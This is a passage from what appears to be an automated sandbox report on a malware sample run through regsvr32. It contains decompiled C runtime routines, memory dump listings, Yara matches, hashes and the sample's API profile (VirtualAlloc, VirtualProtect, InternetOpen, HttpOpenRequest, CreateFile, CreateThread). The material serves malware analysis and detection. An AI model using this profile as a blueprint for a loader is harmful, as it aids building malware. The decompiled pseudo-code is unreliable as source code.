                                                      				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                      				_a84 = 0x20;
                                                      				_a92 = 1;
                                                      				_a840 = _a88 - _a104 - _a92;
                                                      				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                      				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                      				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                      				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                      				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                      				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                      				if (_a76 == 0) goto 0xf9d3cc1d;
                                                      				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                      				_a872 = 0;
                                                      				_a848 = _a64;
                                                      				_a856 = _a104;
                                                      				_a856 = _a856 - 1;
                                                      				if (_a856 == 0) goto 0xf9d3cc1b;
                                                      				_a1056 =  *_a848 & 0x0000ffff;
                                                      				r9d = _a1056 & 0x0000ffff;
                                                      				r8d = 6;
                                                      				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                      				_a848 =  &(_a848[1]);
                                                      				if (_a872 != 0) goto 0xf9d3cbe5;
                                                      				if (_a860 != 0) goto 0xf9d3cbf2;
                                                      				_a688 = 0xffffffff;
                                                      				goto 0xf9d3cc1b;
                                                      				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                      				goto 0xf9d3cb60;
                                                      				goto 0xf9d3cc3b;
                                                      				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                      				if (_a688 < 0) goto 0xf9d3cc6e;
                                                      				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                      				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                      				if (_a96 == 0) goto 0xf9d3cc8e;
                                                      				0xf9d25330();
                                                      				_a96 = 0;
                                                      				goto 0xf9d3b99c;
                                                      				if (_a704 == 0) goto 0xf9d3ccb4;
                                                      				if (_a704 == 7) goto 0xf9d3ccb4;
                                                      				_a1060 = 0;
                                                      				goto 0xf9d3ccbf;
                                                      				_a1060 = 1;
                                                      				_t257 = _a1060;
                                                      				_a876 = _t257;
                                                      				if (_a876 != 0) goto 0xf9d3cd05;
                                                      				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                      				_a32 = _t359;
                                                      				r9d = 0;
                                                      				r8d = 0x8f5;
                                                      				0xf9d2b3b0();
                                                      				if (_t257 != 1) goto 0xf9d3cd05;
                                                      				asm("int3");
                                                      				if (_a876 != 0) goto 0xf9d3cd61;
                                                      				0xf9d2ab30();
                                                      				 *_t359 = 0x16;
                                                      				_a32 = 0;
                                                      				r9d = 0x8f5;
                                                      				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      				_a912 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				goto 0xf9d3cd80;
                                                      				_a916 = _a688;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      			}












                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: 0$9
                                                      • API String ID: 1967237116-1975997740
                                                      • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                      • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                                      • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                      • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 23%
                                                      			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                      				signed int _t213;
                                                      				signed char _t218;
                                                      				void* _t249;
                                                      				intOrPtr _t257;
                                                      				signed int _t331;
                                                      				signed int _t332;
                                                      				signed long long _t335;
                                                      				intOrPtr* _t354;
                                                      				intOrPtr* _t359;
                                                      				signed long long _t389;
                                                      
                                                      				_t331 = __rax;
                                                      				_a1220 = 0x27;
                                                      				_a72 = 0x10;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                                      				_a84 = 0x30;
                                                      				_a86 = _a1220 + 0x51;
                                                      				_a92 = 2;
                                                      				_a72 = 8;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                                      				asm("bts eax, 0x9");
                                                      				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                                      				E000007FE7FEF9D31EA0( &_a1560);
                                                      				_a1304 = _t331;
                                                      				goto 0xf9d3e844;
                                                      				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                                      				E000007FE7FEF9D31EA0( &_a1560);
                                                      				_a1304 = _t331;
                                                      				goto 0xf9d3e844;
                                                      				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                                      				_t332 = E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t332;
                                                      				goto 0xf9d3e807;
                                                      				E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t332;
                                                      				goto 0xf9d3e844;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                                      				E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t332;
                                                      				goto 0xf9d3e844;
                                                      				E000007FE7FEF9D31E40( &_a1560);
                                                      				_a1304 = _t332;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                                      				if (_a1304 >= 0) goto 0xf9d3e87b;
                                                      				_a1312 =  ~_a1304;
                                                      				asm("bts eax, 0x8");
                                                      				goto 0xf9d3e88b;
                                                      				_t335 = _a1304;
                                                      				_a1312 = _t335;
                                                      				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                                      				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                                      				_a1312 = _a1312 & _t335;
                                                      				if (_a116 >= 0) goto 0xf9d3e8d1;
                                                      				_a116 = 1;
                                                      				goto 0xf9d3e8ee;
                                                      				_a80 = _a80 & 0xfffffff7;
                                                      				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                                      				_a116 = 0x200;
                                                      				if (_a1312 != 0) goto 0xf9d3e901;
                                                      				_a92 = 0;
                                                      				_a64 =  &_a687;
                                                      				_t213 = _a116;
                                                      				_a116 = _a116 - 1;
                                                      				if (_t213 > 0) goto 0xf9d3e92f;
                                                      				if (_a1312 == 0) goto 0xf9d3e9cc;
                                                      				_a1480 = _a72;
                                                      				_a1296 = _t213 / _a1480 + 0x30;
                                                      				_a1488 = _a72;
                                                      				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                                      				_t218 = _a1296 + _a1220;
                                                      				_a1296 = _t218;
                                                      				 *_a64 = _a1296 & 0x000000ff;
                                                      				_a64 = _a64 - 1;
                                                      				goto 0xf9d3e90e;
                                                      				_a104 = _t218;
                                                      				_a64 = _a64 + 1;
                                                      				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                                      				if (_a104 == 0) goto 0xf9d3ea0b;
                                                      				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                                      				_a64 = _a64 - 1;
                                                      				 *_a64 = 0x30;
                                                      				_a104 = _a104 + 1;
                                                      				if (_a108 != 0) goto 0xf9d3ec7c;
                                                      				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                                      				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                                      				_a84 = 0x2d;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ea9d;
                                                      				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                                      				_a84 = 0x2b;
                                                      				_a92 = 1;
                                                      				goto 0xf9d3ea9d;
                                                      				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                                      				_a84 = 0x20;
                                                      				_a92 = 1;
                                                      				_a1320 = _a88 - _a104 - _a92;
                                                      				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                                      				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                      				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                      				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                                      				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                                      				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                      				if (_a76 != 0) goto 0xf9d3ec29;
                                                      				if (_a104 <= 0) goto 0xf9d3ec29;
                                                      				_t354 = _a64;
                                                      				_a1328 = _t354;
                                                      				_a1336 = _a104;
                                                      				_a1336 = _a1336 - 1;
                                                      				if (_a1336 <= 0) goto 0xf9d3ec27;
                                                      				_t249 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                                      				_a1496 = _t354;
                                                      				E000007FE7FEF9D26840(_t249,  &_a120);
                                                      				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                                      				if (_a1340 > 0) goto 0xf9d3ebe7;
                                                      				_a1200 = 0xffffffff;
                                                      				goto 0xf9d3ec27;
                                                      				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                      				_a1328 = _a1328 + _a1340;
                                                      				goto 0xf9d3eb61;
                                                      				goto 0xf9d3ec47;
                                                      				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                      				if (_a1200 < 0) goto 0xf9d3ec7c;
                                                      				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                                      				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                      				if (_a96 == 0) goto 0xf9d3ec9c;
                                                      				0xf9d25330();
                                                      				_a96 = 0;
                                                      				goto 0xf9d3da75;
                                                      				if (_a1216 == 0) goto 0xf9d3ecc2;
                                                      				if (_a1216 == 7) goto 0xf9d3ecc2;
                                                      				_a1504 = 0;
                                                      				goto 0xf9d3eccd;
                                                      				_a1504 = 1;
                                                      				_t257 = _a1504;
                                                      				_a1344 = _t257;
                                                      				if (_a1344 != 0) goto 0xf9d3ed13;
                                                      				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                      				_a32 = _t359;
                                                      				r9d = 0;
                                                      				r8d = 0x8f5;
                                                      				0xf9d2b3b0();
                                                      				if (_t257 != 1) goto 0xf9d3ed13;
                                                      				asm("int3");
                                                      				if (_a1344 != 0) goto 0xf9d3ed6f;
                                                      				0xf9d2ab30();
                                                      				 *_t359 = 0x16;
                                                      				_a32 = 0;
                                                      				r9d = 0x8f5;
                                                      				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      				_a1376 = 0xffffffff;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				goto 0xf9d3ed8e;
                                                      				_a1380 = _a1200;
                                                      				E000007FE7FEF9D26800( &_a120);
                                                      				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: '$9
                                                      • API String ID: 1967237116-1823400153
                                                      • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                      • Instruction ID: 29668378713c93b892a0041d725b85e979c1ad93fe9cb8202607dd12c91b0faa
                                                      • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                      • Instruction Fuzzy Hash: 0241C33660DA858AE7A18B19E8407AFB3E4F7C5752F100125E6D8C6AE8EBBDD4408F14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _unlock
                                                      • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                      • API String ID: 2480363372-1749241151
                                                      • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                      • Instruction ID: 04ee9255729ef7e149dbf43242f730f4bbed3ff16cc2c5ac2558ad9c7efde415
                                                      • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                      • Instruction Fuzzy Hash: BC113D7AA2868686EBE49B94DC41B6D63E1F780755F205035E68E43BA4CB3DE404CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                      • String ID: csm
                                                      • API String ID: 1826589669-1018135373
                                                      • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                      • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                                      • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                      • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                      • API String ID: 2882679554-3458198949
                                                      • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                      • Instruction ID: d33f1896f8d52307a9012ea76dc3fce74adc3acb1f5112dbea688671cc213a85
                                                      • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                      • Instruction Fuzzy Hash: 3B01F431A1C78286EBD09B6AE88576EB3D4F390350F614535E6CD43FA9DBBED4058B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:16.2%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:4%
                                                      Total number of Nodes:99
                                                      Total number of Limit Nodes:14

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1240656808.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_2d0000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                      • API String ID: 2313188843-2517549848
                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction ID: 27af7da60f8e159f921c9c0965cb960fdb099243c951251c6f8f7bd1735e21d8
                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction Fuzzy Hash: 1572D530628B498BDB19DF18D8857B9B7E1FB98305F10462EE8CAC7311DB34E956CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O}$X$bW
                                                      • API String ID: 0-980370356
                                                      • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                      • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
                                                      • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                      • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "Gd$C2$HG
                                                      • API String ID: 0-142661339
                                                      • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                      • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                      • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                      • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $!$e##
                                                      • API String ID: 0-2900154246
                                                      • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                      • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                      • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                      • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen
                                                      • String ID: &J@$Va$Z*
                                                      • API String ID: 2038078732-1197100596
                                                      • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                      • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                      • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                      • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 646 18001bf0c-18001bfb0 call 18001feb0 649 18001bfb2-18001c02b call 180026974 646->649 650 18001c031-18001c063 CreateFileW 646->650 649->650
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: `/
                                                      • API String ID: 823142352-1163903809
                                                      • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                      • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                      • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                      • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConnectInternet
                                                      • String ID:
                                                      • API String ID: 3050416762-0
                                                      • Opcode ID: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                      • Instruction ID: 6bd4319daaf70d9cfa93cd172db4ac0144cd1887b423fd46bbb7d9a578168b32
                                                      • Opcode Fuzzy Hash: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                      • Instruction Fuzzy Hash: 8C41F7705087848FC7B8DF58D48579ABBE0FB98315F108A5EE48DD7361DB749884CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID:
                                                      • API String ID: 2039140958-0
                                                      • Opcode ID: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                      • Instruction ID: e87697cfd510fd4059a611545946932b1d04e28e1a34b551021fd5cd6805f499
                                                      • Opcode Fuzzy Hash: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                      • Instruction Fuzzy Hash: AB31E770618B888FD7B8CF68D4857AAB7E1FB89315F508A1EE48DC7251CB749845CB43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HttpOpenRequest
                                                      • String ID:
                                                      • API String ID: 1984915467-0
                                                      • Opcode ID: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                      • Instruction ID: c8d36c456ba033a28ec6fbd746a54a3663befea28eedef4c15a9fc959fe4c155
                                                      • Opcode Fuzzy Hash: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                      • Instruction Fuzzy Hash: D331607050CB848BE7B4DF08D4C9B9AB7E0FB98315F108A4DE48DD7296CB789484CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                      • Instruction ID: 87f7a9be59381a5b3d954798ed335bb6745bcd8ebd0cdd375d804fe942fcfa66
